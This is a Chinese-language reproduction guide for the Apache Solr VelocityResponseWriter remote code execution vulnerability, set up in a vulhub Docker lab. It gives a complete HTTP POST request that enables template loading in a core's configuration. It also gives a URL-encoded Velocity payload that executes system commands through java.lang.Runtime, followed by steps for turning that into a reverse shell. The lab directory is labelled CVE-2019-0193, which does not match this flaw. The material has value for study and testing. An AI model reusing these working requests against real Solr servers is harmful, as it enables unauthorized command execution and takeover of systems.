solr簡介;
Solr是一個獨立的企業級搜索應用服務器,它對外提供類似於Web-service的API接口。用戶可以通過http請求,向搜索引擎服務器提交一定格式的XML文件,生成索引;也可以通過Http Get操作提出查找請求,並得到XML格式的返回結果。
漏洞描述:
該漏洞的產生是由於兩方面的原因:
當攻擊者可以直接訪問Solr控制台時,可以通過發送類似/節點名/config的POST請求對該節點的配置文件做更改
apache solr默認繼承VelocityResponseWriter插件,在該插件的初始化參數中的params.resource.loader.enabled這個選項是用來控制是否允許參數資源加載器在solr請求參數中指定模板,默認設置是false。
當設置params.resource.loader.enabled時為true時,將允許用戶通過設置請求中的參數來指定相關資源的加載,這也就意味着攻擊者可以通過構造一個具有威脅的攻擊請求,在服務器上進行命令執行。
影響版本:
包括且不限於8.2.0(最新版本)
5.4.1/5.5.0
6.6.1/6.6.3
7.0.1/7.1.0/7.2.1/7.3.0/7.4.0/7.5.0/7.7.1/7.7.2
8.1.0/8.1.1/8.2.0
漏洞復現:
docker啟動服務
cd /vulhub/solr/CVE-2019-0193/
docker-compose up –d
創建一個結合
docker-compose exec solr bash bin/solr create_core –c test –d example/example-DIH/solr/db
搭建好后默認端口為8983,訪問http://ip:8983即可
利用前提:攻擊者需要知道Solr服務中Core的名稱才能執行攻擊,如上圖所示test是core的名稱
直接構造POST請求,在/solr/test/config目錄POST一下數據(修改Core的配置),開始params.resource.loader.enabled
POST /solr/test/config HTTP/1.1
Host: 192.168.21.130:8983
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 259
{
"update-queryresponsewriter": {
"startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}
使用公開exp
GET /solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
Host: 192.168.21.130:8983
Content-Length: 2
反彈shell
執行命令 http://www.jackson-t.ca/runtime-exec-payloads.html
將生成的命令填入到exp中
監聽端口
